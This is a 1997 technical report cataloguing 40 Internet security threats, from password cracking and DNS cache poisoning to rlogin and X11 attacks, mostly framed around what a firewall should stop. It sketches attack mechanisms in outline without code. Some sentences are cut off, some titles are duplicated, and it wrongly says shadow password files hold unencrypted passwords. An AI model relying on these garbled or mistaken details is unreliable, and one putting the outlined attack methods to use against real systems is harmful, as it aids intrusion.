40 Internet Security Threats
David J. Stang, Ph.D.
With every passing day, we witness a huge increase in interest in Internet
access, sometimes called the "information highway". The public is now aware of
the Internet as a source of valuable information. We now have a glut of books on
how to use the Internet. There is a surge in the number of new Internet users,
new addresses, and sales of hardware and software to permit Internet access.
We are also witnessing a general awakening to an understanding that there are
security problems that might result when connecting to the Internet. While the
public seems aware that such problems exist, very few people have any detailed
knowledge of what the problems are. Many now think they should buy a firewall
to prevent such problems. They think that firewalls are generic things, like
fire extinguishers, that probably all are about equally effective, and that with a
firewall installed, they will have dealt with the Internet security problems they
have heard of.
Users are headed for trouble if they continue to believe this. There are a wide
variety of problems. Most firewalls don't stop a fraction of them. Firewalls
differ so widely in what they can do that they hardly deserve to be grouped
together under the same name.
In this technical report, we will not tackle the entire problem of Internet
security. Rather, we will focus on a manageable set of issues:
What are the some of the security problems that can arise with an
What are the kinds of technology available that might help with such
Your internal network is potentially vulnerable to a wide variety of attacks
from the outside. Here are some examples, each of which you might ask your
firewall to defend you against. Most of the attacks are described in more detail in
Cheswick & Bellovin. We use published descriptions of attacks and provide
fairly little information about each, in an effort to minimize the "training" that
this report might provide to attackers. Our intent is to show the wide array of
mechanisms by which an attacker can get into your kitchen, living room, and
bedroom. Here is a short list of just 40 vulnerabilities:
1.Attacks via password guessing. Guessable passwords (such as
"service" as a password for an account named "field", or the default
passwords provided at installation time) can defeat nearly any system,
and are the most common means by which a system is penetrated. A
proper firewall should establish the non-guessability of all passwords
used by the system it is protecting. It should also provide additional
authentication mechanisms, such as authenticating both machine
(Ethernet address, for instance) and user. It should also limit the
number of login attempts, to prevent unlimited guessing.
2.Brute force password guessing Password guessing attacks on the
encrypted password file (/etc/passwd) will normally succeed when the
attacker uses a hacking tool such as CRACK and the file has a sufficient
number of names in it. Some of these attacks can extract as many as
25% of the passwords in the file, some of which will be useful in
entering other systems. A good firewall protects the password file, and
prevents its transmission or alteration.
3.Tapping terminal sessions Tapping terminal sessions is a
technique in which the attacker merely monitors an active user,
capturing their keystrokes and looking for a login to another system.
Such attacks are possible with the default configuration of even
"secure" versions of UNIX, such as OSF/1.
4.Keystroke capture of password via TSRKeystroke capture of
password via TSR can be done with any number of hacker tools such as
THIEF or GETIT or even Borland's SUPERKEY. With this attack, the
hacker is likely to need to be able to later access the local drive to pick
up the file containing the captured keystrokes.
5.A sequence number attack occurs when a hacker predicts the
target's choice of starting points, places such an origin in the IP source
address, and then engages any protocol that uses this address for
authentication (such as the r commands in UNIX). A firewall might be
expected to prevent such an attack by a more secure authentication of
6.Spoofing UDP packets is easy for an attacker if your applications
use the User Datagram Protocol to transmit information. UDP does not
use handshaking or sequence numbers, and sends all packets for a given
port to the same process, regardless of source address or port number.
A firewall might be expected to independently verify the source of a
UDP packet before processing it, even if the source is internal to the
7.Tearing down ICMP connectionsTearing down ICMP connections.
The Internet Control Message Protocol (ICMP) is a mechanism that
informs hosts of better routing, terminates connections when network
problems arise and can report routing troubles. Older versions ignore
the connection-specific information of an ICMP message, and may
redirect all connections between a pair of hosts, replacing the original
connection with a new one. Hacking tools to tear down connections using
this technique are available to the underground.
8.Redirecting ICMP connections ICMP messages can be redirected,
establishing routing between a new pair of hosts. Many routers will
respond to such instructions, though they should be set to do no such
thing! A proper firewall design would respond to these instructions only
when its own trusted router provides the request.
9.Loose Source Route option attacksLoose Source Route option
attacks require that the hacker initiates a TCP connection, specifying an
explicit path to the destination. When it sees that this procedure is
being used, the destination uses the inverse of the path if the source is
trusted (source becomes destination), conforming to RFC 1122. This
permits any attacker to impersonate a trusted machine. Independent
authentication by a proper firewall can defeat this approach.
10.Bogus Routing Information Protocol attacks insert additional
RIP packets into a network. If the attacker is closer to the target than
the original source, traffic is diverted to the attacker. In some
implementations of RIP, there is no authentication field and no dialog
between pairs of hosts to establish authenticity. In such a case, it is
possible for the attacker to provide the host with a host-specific route,
making this attack more difficult to detect.
11.Zone transfer attack. The Domain Name System (DNS) is a
distributed database that maps host name and IP addresses. TCP queries
by backup servers can produce zone transfers, in which a full copy of a
portion of the name space is produced, so that the backup server can do
its job. In a zone transfer attack, hackers can make similar
requests of DNS, obtaining a list of potential target hosts and IP
12.Inverse mapping tree attack In many systems, the DNS permits
subtrees to be stored on other servers. Because DNS maintains pairs of
trees one mapping host names to addresses, and the other mapping
addresses to names an attacker can modify an inverse record to show the
name of a trusted host, the address of the attacker. Then, by using
rlogin, the attacker may be able to convince your machine that it is a
trusted host. A firewall might be able to prevent such an inverse
mapping tree attack if it protected the DNS or performed more
thorough authentication by checking IP addresses.
13.DNS cache attacks. In all but the most recent versions of DNS, it is
possible to pre-contaminate the cache of DNS responses, then
initiate the call. When the target checks the cache of valid responses, it
then finds a name match and permits the attack. A firewall must use
both name-based and address-based authentication, if it is to be trusted.
14.DNS Resolver attacksDNS Resolver attacks exploit a weakness in
DNS resolvers in which, to be more efficient, the resolver is willing to
connect to destinations in which the match on domain names is
incomplete. Thus a domain with a name in common with a name in a
desired destination address might be able to intercept traffic intended
for another destination.
15.SMTP overload attacks. The Simple Mail Transport Protocol
(SMTP) provides a simple set of rules for transporting 7-bit
messages. The protocol can be imitated easily, and because there is no
authentication, messages can be entered manually by an attacker.
Because an attacker can manually specify any source for the mail, it is
possible for an attacker to overload the system with bogus messages,
creating a denial of service attack. In such an attack, the mail
system loses functionality, even if the host doesn't collapse under the
weight of the bogus incoming messages.
16.Alias Expansion. SMTP permits aliases to be used when transmitting
mail. But commands such as vrfy may translate mail aliases to login
names, and expn expand mailing list aliases. A firewall should ensure
that expansion of aliases to names is done inside the organization, to
preserve the confidentiality of those who use the system.
17.sendmail attacks. sendmail is the most common means by which
SMTP is implemented, and with thousands of lines of code, there are
many bugs. Root is no place to run such a documentedly-dangerous
program! sendmail need not run as root unless it is doing local delivery
on gateway machines. Alternatives to sendmail are available, including
potentially safer front-ends to it.
18.MIME header attacks. A mailer on a machine receiving mail that has
been encoded with MIME (Multipurpose Internet Mail Extensions)
might be expected to carry out the instructions in the header of the
MIME message. Such instructions, if not carefully evaluated before
execution, can overwrite .rhosts in the current directory and perform
other forms of mischief.
19.Executables attached to mail. If the mail system can be entered by
an attacker who can forge a message, then the attacker won't have
difficulty attaching a program to the mail. The program can be designed
to do anything the attacker wishes, and is likely to be successful with
this Trojan if it appears to do something useful for the recipient. The
Trojan, for instance, might seek to capture passwords as a TSR, or
might merely contain a virus not detected by the recipient's virus
scanner. Sometimes the Trojan is a "dropper" a program containing a
virus. The program and virus are usually encrypted, to prevent a
scanner from detecting the virus; when the program is run, the virus
is released to infect files, or is placed in a sector, where it will execute
with the next boot. Trojans and droppers do not require a deliberate
attack, of course: they can be attached to E-mail by well-meaning
senders who are unaware of the hidden contents of the program they
20.Attacks via corrupted telnet. telnet provides a user with terminal
access. In an unsecure system, the telnet program can be compromised
by an attacker to capture user name, password, or even the entire
terminal session. Alternatively, if the attacker is not interested in what
you are doing, but rather wishes to have the access offered by your
account, the attacker's telnet replacement can simply keep the
connection open after you think you've logged out.
21.Tapping the communications link. When any portion of a
communications link is tapped, unencrypted passwords cannot be
trusted. Often the easiest place to attack a communications link is a tap
on its backbone.
22.NTP attacks. When an authentication service is time-sensitive, so
that a different value for authentication is used at each different time,
an attacker has an opportunity to capture what was used for
authentication as well as the time of authentication, then attempt to
instruct the host via the Network Time Protocol (NTP) to set the time
back to the captured authentication string's valid time, then simply
playback the captured authentication string. Such NTP attacks are not
absolutely prevented by the latest versions of NTP.
23.finger attacks. The finger protocol provides information on users
that is quite useful to attackers, including their name, electronic mail
address, when the account was last used, where the user last connected
from, idle periods, unread mail, etc. Attackers appreciate finger for its
help in identifying relatively unused accounts and the match between
names and mail addresses handy for password guessing. finger is a
dangerous service, far less secure than whois.
24.Forging UNIX authentication fields in RPC headers. RPC
(Sun's Remote Procedure Call) is a protocol that provides a designer
with the means of creating a network service which can reach out and
make subroutine calls to remote servers. Every RPC message has a
header which can include authentication information. The information
might be "null", for anonymous services, or might include "UNIX
authentication" information, including the supposed numeric user id
and group id of the caller and the name of the calling machine. All of the
information in these fields can be readily forged by an attacker, and the
RPC request can essentially ask for any service available on the host.
25.Portmapper denial of service attacks. Portmapper helps connect
RPC clients and servers, and uses RPC for its work. One call supported
by portmapper is to unregister a service. Because portmapper does not
do much to authenticate such a request, portmapper denial of service
attacks are straight-forward.
26.Portmapper reports to attackers via rpcinfo. Portmapper will
also provide information on each service the server is running,
including its protocol (e.g., UDP or TCP), its port number, and its
version number. An attacker's work is easier after they obtain this
information with rpcinfo.
27.Attacks using portmapper to hide source location. Use of RPC
normally requires that a roundtrip of messages is required to
determine the real port number of the client/source/attacker. To save
this trip, portmapper permits the source to request that it transfer its
request to the target server, carrying portmapper's own return
address, rather than the actual source's. This ability makes legitimate
local requests indistinguishable from those made by outside callers.
While some versions of portmapper can do their own filtering, many
28.NIS attacks which obtain the password file, host address
table, or public and private key databases. Network
Information Services (NIS, formerly known as YP or Yellow Pages) is a
service that distributes many important databases from a central
server to its clients. Such databases include the password file, the host
address table, and public and private key databases used for Secure RPC.
This attack instructs NIS to transfer one or more of these key files to
29.Attacks impersonating NIS backup servers NIS clients can be
told to use a different NIS server, should it go down; the replacement
server can be fraudulent, and supply false /etc/passwd file entries,
false host addresses, etc.
30.RPC attacks on the NIS shadow password file. A shadow
password file is a hidden copy of the password file which holds the
actual, unencrypted passwords. An attacker is unlikely to be able to
access this file directory, but can make repeated requests for RPC
services using a variety of passwords. Applications check this file for
the password, and report back to the attacker whether the password is
valid. RPC does not log flurries of requests for passwords.
31.Attacks using NFS root file handles. To mount a volume for a
client, a server running NFS (Network File System) the RPC mount
daemon at the NFS server asks the client for name and requested file
system, examines an administrator-supplied list, and if the client is on
the list, sends the client the file handle for the root directory. The
client maintains this file handle, and uses it in subsequent requests. If
the client keeps the handle (e.g., records it for later use) the client has
permanent access to that root. Root file handles can be shared, and once
a user is given a root file handle, there is no mechanism for later taking
it back. Considering the many problems that can occur in managing NFS,
secure alternatives such as the Andrew File System (AFS) should be
considered. AFS uses Kerberos for its authentication and provides a
single scalable, global, location-independent file system. Files can
reside anywhere in the network, with caching occurring transparently.
32.Attacks via tftp. The Trivial File Transport Protocol is a UDP-based
file transfer mechanism which does not support authentication at all. If
tftp is not restricted to just one or two directories, then attacks on the
password file are simple.
33.Attacks using anonymous ftp. FTP (File Transfer Protocol) is a
program and file distribution system that rivals e-mail for importance
on the Internet. Anonymous ftp permits any caller to transfer files
from a restricted area of the host without providing any further
authorization. If ftp is set up so that a file or directory in the
anonymous ftp area is writable or owned by the ftp login, then an
attacker can use ftp to write a file named .rhosts to ftp's home
directory, then use that file to authorize an rsh connection to the target
machine as ftp. From there, the attacker proceeds to transfer files.
34.Anonymous ftp captures of /etc/passwd/etc/passwd. If you
happen to leave the /etc/passwd file in an area reachable by anonymous
ftp, assume a visitor will help themselves to a copy.
35.Undesirable files placed in the publicly writable
anonymous ftp directory. If you have an area where anonymous ftp
callers can place files, you should assume that this area will sooner or
later hold copies of pirated, pornographic, slanderous, or
virus-infected files. Such files may be placed their for your own
amusement, for the "benefit" of those within your organization, or
simply for others witting or unwitting to come and collect.
36.Denial of service by filling the publicly writable
anonymous ftp. If a caller can place files on your system
anonymously, it may be a matter of time before some caller places an
expanding file there that fills the available space. Such a project will
potentially disable any audit trail, slow other processes (or down the
system), and, at a minimum, deny additional callers write-access to
37.Anonymous ftp attacks by replacement of commands within
the ftp area. Any program such as ls which resides in the ftp area can
be potentially replaced by an attacker, subsequently resulting in
unexpected and undesired results.
38.Attacks with rlogin. rlogin permits login to a remote machine
without a password if a few simple conditions are met: the caller must
be listed in the destination's lists of trusted callers (such as
/etc/hosts.equiv or $HOME/.rhosts), the caller must come through a
privileged TCP port, and usually the caller's name must correspond to
the caller's IP address. Both users and hackers like rlogin. Users like it
because it does not require password entry, permits them to access
other remote machines by simply adding them to the user's personal
.rhosts file, and seems to work fine. Attackers like it because all they
need to do is drop a file listing them as authorized in /etc/hosts.equiv,
/usr/spool/uucppublic, /usr/ftp, etc. After they have gotten in with
rlogin, they can capture lists of other trusting machines from
/etc/hosts.equiv and other files, and from there explore many other
39.Attack X11 servers. X11 is the most popular windowing system on
the Internet. The system treats the user of it as a server, and permits
applications to interact with it. An application is able to track
keystrokes, capture screens, simulate keystrokes, etc. The main
protection of most X11 servers is that they only permit certain
machines to make requests of them. X11 servers are typically not
notified of denied access requests, nor can they verify what process is
using them. Attackers anywhere on the Internet can find and control all
unprotected X11 servers.
40.Tunneling and encapsulation. If you run a firewall that only
permits certain protocols, other protocols will be able to pass through
if they are encapsulated within approved protocols, unless you examine
the contents of each packet before it is permitted to pass through the
firewall. Once a tunnel has been constructed between a "mole" inside
your organization and a party outside your organization, bidirectional
tunnel traffic will not be impaired by your firewall.
Last Revised Wednesday April 16, 1997.
Please direct questions or problems regarding this web site to our Webmaster.
Š 1997 Seven Locks Software, Inc. All rights reserved. Legal Notices.